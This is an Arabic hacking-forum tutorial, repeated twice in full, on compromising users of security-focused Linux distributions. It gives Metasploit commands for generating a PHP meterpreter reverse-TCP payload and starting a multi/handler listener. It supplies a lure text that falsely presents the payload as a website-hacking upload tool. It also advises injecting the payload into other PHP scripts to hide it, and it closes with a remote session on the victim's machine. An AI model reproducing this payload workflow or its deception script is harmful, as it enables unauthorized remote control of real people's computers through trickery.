r00t-minat0r
01-20-2012, 09:55 PM
http://up.arab-x.com/Feb10/Yeq33899.png
بسم الله الرحمن الرحيم
والصلاة والسلام على أشرف الخلق والمرسلين محمد وعلى آله وصحبه اجمعين
اليوم شباب لدينا احد دروس [ دورة التوزيعات الأمنية ] على منتديات جيوش الهكر
http://img104.herosh.com/2011/09/22/968555532.png
درسنا اليوم بعنوان
[ اختراق احدى التوزيعات الأمنية باستخدام Windows XP ]
قد يستغرب البعض هذا العنوان فكما تعودنا نظام XP هو ما يتم اختراقه باستخدام التوزيعات الأمنية
لكن فقط في الجيوش تنقلب الموزايين .
لقد سمعت من بعض الشباب الذي يستخدمون الباك تراك او غيره من التوزيعات الأمنية انه لا يمكن اختراقهم لان هذه التوزيعات هي لنكس ولنكس لا يمكن اختراقه .
ولكن هذا غير صحيح بل يمكن اختراق مستخدمي هذه التوزيعات وهذا ما سنشرحه اليوم
وايظا كون في كل شروحات الاختراق المتقدم يكون الضحية [ المدعوس ] هو نظام [ Windows ] ولكن اليوم سوف نعطي لهذا النظام فرصة للدفاع عن نفسه .
http://img104.herosh.com/2011/09/22/968555532.png
[ الفكرة ]
سوف نقوم بصناعة [ Payload ] بصيغة [ PHP ] ومن ثم استخدام القليل من [ الهندسة الأجتماعية ] لاختراق جهاز الضحية
http://img104.herosh.com/2011/09/22/968555532.png
جيب توفر مشروع [ Metasploit ] على جهاز Windows
http://img104.herosh.com/2011/09/22/968555532.png
نبدا الشرح بعد :
[ بسم الله الرحمن الرحيم ]
اولا نقوم بتشغيل مشروع [ Metasploit ]
http://img824.imageshack.us/img824/7041/metae.png
ومن ثم ننفذ الاوامر التالي لانشاء [ Payload ] من نوع [ PHP ]
use payload/php/meterpreter/reverse_tcp
set LHOST "الايبي بتاعك"
set LPORT "بورت الاتصال العكسي
قم باستبدال البيانات المطلوبة بالأبيانات الصحيحة
http://www.mediafire.com/imgbnc.php/31627383adeace6e4122a72c7cf0e26f71b18c9acbe14e5c7c 04860915f170556g.jpg
الأن نقوم بتنفيذ الامر التالي لانتاج كود [ PHP ] للبيلود
generate -t raw
سوف تخرج لنا شاشة الـ [ Metasploit ] الكود
قم بنسخ الكود ابتداءا من كلمة :
#<?php
وانتهاءا بكلمة :
die();
انسخ الكود بشكل كامل وضعه في ملف نصي جديد
http://www.mediafire.com/imgbnc.php/436f794f2a3fd1a4e456d78cd2108ed4689d911738addde3ca 9500110a725ad46g.jpg
قم بحفظ الملف بأي اسم تريده بصيغة [ PHP ]
مثال :
payload.php
الان نقوم بتشغيل التنصت على الأتصال الخارجي في الميتاسبلوت
وذلك عن طريق تنفيذ الاوامر التالية :
use multi/handler
set lport "بورت الأتصال العكسي"
set lhost "الأيبي بتاعك"
set payload php/meterpreter/reverse_tcp
http://www.mediafire.com/imgbnc.php/6e1c8a637f9cbaa6ffbbfb4ad5e6093abb7cad7b2f818ad615 c323f798812fd76g.jpg
ومن ثم نبدا التنصت باستخدام الأمر
exploit
http://www.mediafire.com/imgbnc.php/b52a93399fd73ee128de67161d4fab55ec8579ce67dea4531b 51ede47ae3c4006g.jpg
نقوم الان باستخدام الـ [ الهندسة الأجتماعية ] لارسال الـ [ Payload ] الى الضحية وجلعه يشغله .
طبعا هنا عليك الأبداع فمثلا بما ان الـ [ Payload ] من نوع [ PHP ] حاول خداع الضحية بأخباره ان هذا الملف هو سكربت لأختراق المواقع .
مثال :
This PHP script will Allow you to to upload a file to any site that using linux server
just start the file using the command
php file.php
or
put it in your PHP server and start it
وانت حاول ان تخترع طرق من عندك لايهام الضحية بان هذا الملف سوف يساعده في اختراق موقع ما او جهاز ما .
والان على جهة الضحية وفي هذه الحالة سوف تكون احدى التوزيعات الأمنية
وفي الشرح استخدم توزيعه [ BlackBuntu ]
http://www.mediafire.com/imgbnc.php/4ada82c927b3c8cf6a11499e315691b909bec8dec11fe84a09 c7ff82cfc5b1826g.jpg
سوف يقوم الضحية بتشغيل الملف بطريقتين
الأول : ( باستخدام سطر الاوامر )
تنفيذ الامر التالي :
php filename.php
الثانية : ( باستخدام سيرفر )
سوف يقوم بوضع الملف في سيرفر المواقع المرفق في التوزيعه مثل :
Apache
وتشغيل الملف من المتصفح
في كلتا الحالتين سوف يتم الأختراق
تشغيل الملف :
http://www.mediafire.com/imgbnc.php/91ac486753c3cc5ad557cbc0202129ed2ca5503386a781152b 0ba2f2b3ea31b86g.jpg
باستخدام سطر الاوامر :
php filename.php
http://www.mediafire.com/imgbnc.php/1ca84028a7d92388539101ac2a9c206a00bfd3bd71180b6ebb ff633c3661a45b6g.jpg
كما ترون لم يظهر للضحية اي شيء في سطر الأوامر بعد تشغيل الملف
يمكنك حقن كود الملف في اي سكربت [ PHP ] لابعاد الشك
الان نذهب الى جهاز الهكر وفي هذه الحالة هو نظام [ Windows XP ]
لنرى النتيجة وهي :
http://www.mediafire.com/imgbnc.php/4e888690fa142d68b09853d5f709388db587015243e69645c8 d599e8df291cad6g.jpg
Game Over
كما ترون تم فتح الجلسة بنجاح والان انت تمتلك السيطرة على جهاز الضحية
no one is safe
http://img104.herosh.com/2011/09/22/968555532.png
اتمنى ان يعجبكم الشرح
والسلام عليكم ورحمة الله وبركاته
بسم الله الرحمن الرحيم
والصلاة والسلام على أشرف الخلق والمرسلين محمد وعلى آله وصحبه اجمعين
اليوم شباب لدينا احد دروس [ دورة التوزيعات الأمنية ] على منتديات جيوش الهكر
http://img104.herosh.com/2011/09/22/968555532.png
درسنا اليوم بعنوان
[ اختراق احدى التوزيعات الأمنية باستخدام Windows XP ]
قد يستغرب البعض هذا العنوان فكما تعودنا نظام XP هو ما يتم اختراقه باستخدام التوزيعات الأمنية
لكن فقط في الجيوش تنقلب الموزايين .
لقد سمعت من بعض الشباب الذي يستخدمون الباك تراك او غيره من التوزيعات الأمنية انه لا يمكن اختراقهم لان هذه التوزيعات هي لنكس ولنكس لا يمكن اختراقه .
ولكن هذا غير صحيح بل يمكن اختراق مستخدمي هذه التوزيعات وهذا ما سنشرحه اليوم
وايظا كون في كل شروحات الاختراق المتقدم يكون الضحية [ المدعوس ] هو نظام [ Windows ] ولكن اليوم سوف نعطي لهذا النظام فرصة للدفاع عن نفسه .
http://img104.herosh.com/2011/09/22/968555532.png
[ الفكرة ]
سوف نقوم بصناعة [ Payload ] بصيغة [ PHP ] ومن ثم استخدام القليل من [ الهندسة الأجتماعية ] لاختراق جهاز الضحية
http://img104.herosh.com/2011/09/22/968555532.png
جيب توفر مشروع [ Metasploit ] على جهاز Windows
http://img104.herosh.com/2011/09/22/968555532.png
نبدا الشرح بعد :
[ بسم الله الرحمن الرحيم ]
اولا نقوم بتشغيل مشروع [ Metasploit ]
http://img824.imageshack.us/img824/7041/metae.png
ومن ثم ننفذ الاوامر التالي لانشاء [ Payload ] من نوع [ PHP ]
use payload/php/meterpreter/reverse_tcp
set LHOST "الايبي بتاعك"
set LPORT "بورت الاتصال العكسي
قم باستبدال البيانات المطلوبة بالأبيانات الصحيحة
http://www.mediafire.com/imgbnc.php/31627383adeace6e4122a72c7cf0e26f71b18c9acbe14e5c7c 04860915f170556g.jpg
الأن نقوم بتنفيذ الامر التالي لانتاج كود [ PHP ] للبيلود
generate -t raw
سوف تخرج لنا شاشة الـ [ Metasploit ] الكود
قم بنسخ الكود ابتداءا من كلمة :
#<?php
وانتهاءا بكلمة :
die();
انسخ الكود بشكل كامل وضعه في ملف نصي جديد
http://www.mediafire.com/imgbnc.php/436f794f2a3fd1a4e456d78cd2108ed4689d911738addde3ca 9500110a725ad46g.jpg
قم بحفظ الملف بأي اسم تريده بصيغة [ PHP ]
مثال :
payload.php
الان نقوم بتشغيل التنصت على الأتصال الخارجي في الميتاسبلوت
وذلك عن طريق تنفيذ الاوامر التالية :
use multi/handler
set lport "بورت الأتصال العكسي"
set lhost "الأيبي بتاعك"
set payload php/meterpreter/reverse_tcp
http://www.mediafire.com/imgbnc.php/6e1c8a637f9cbaa6ffbbfb4ad5e6093abb7cad7b2f818ad615 c323f798812fd76g.jpg
ومن ثم نبدا التنصت باستخدام الأمر
exploit
http://www.mediafire.com/imgbnc.php/b52a93399fd73ee128de67161d4fab55ec8579ce67dea4531b 51ede47ae3c4006g.jpg
نقوم الان باستخدام الـ [ الهندسة الأجتماعية ] لارسال الـ [ Payload ] الى الضحية وجلعه يشغله .
طبعا هنا عليك الأبداع فمثلا بما ان الـ [ Payload ] من نوع [ PHP ] حاول خداع الضحية بأخباره ان هذا الملف هو سكربت لأختراق المواقع .
مثال :
This PHP script will Allow you to to upload a file to any site that using linux server
just start the file using the command
php file.php
or
put it in your PHP server and start it
وانت حاول ان تخترع طرق من عندك لايهام الضحية بان هذا الملف سوف يساعده في اختراق موقع ما او جهاز ما .
والان على جهة الضحية وفي هذه الحالة سوف تكون احدى التوزيعات الأمنية
وفي الشرح استخدم توزيعه [ BlackBuntu ]
http://www.mediafire.com/imgbnc.php/4ada82c927b3c8cf6a11499e315691b909bec8dec11fe84a09 c7ff82cfc5b1826g.jpg
سوف يقوم الضحية بتشغيل الملف بطريقتين
الأول : ( باستخدام سطر الاوامر )
تنفيذ الامر التالي :
php filename.php
الثانية : ( باستخدام سيرفر )
سوف يقوم بوضع الملف في سيرفر المواقع المرفق في التوزيعه مثل :
Apache
وتشغيل الملف من المتصفح
في كلتا الحالتين سوف يتم الأختراق
تشغيل الملف :
http://www.mediafire.com/imgbnc.php/91ac486753c3cc5ad557cbc0202129ed2ca5503386a781152b 0ba2f2b3ea31b86g.jpg
باستخدام سطر الاوامر :
php filename.php
http://www.mediafire.com/imgbnc.php/1ca84028a7d92388539101ac2a9c206a00bfd3bd71180b6ebb ff633c3661a45b6g.jpg
كما ترون لم يظهر للضحية اي شيء في سطر الأوامر بعد تشغيل الملف
يمكنك حقن كود الملف في اي سكربت [ PHP ] لابعاد الشك
الان نذهب الى جهاز الهكر وفي هذه الحالة هو نظام [ Windows XP ]
لنرى النتيجة وهي :
http://www.mediafire.com/imgbnc.php/4e888690fa142d68b09853d5f709388db587015243e69645c8 d599e8df291cad6g.jpg
Game Over
كما ترون تم فتح الجلسة بنجاح والان انت تمتلك السيطرة على جهاز الضحية
no one is safe
http://img104.herosh.com/2011/09/22/968555532.png
اتمنى ان يعجبكم الشرح
والسلام عليكم ورحمة الله وبركاته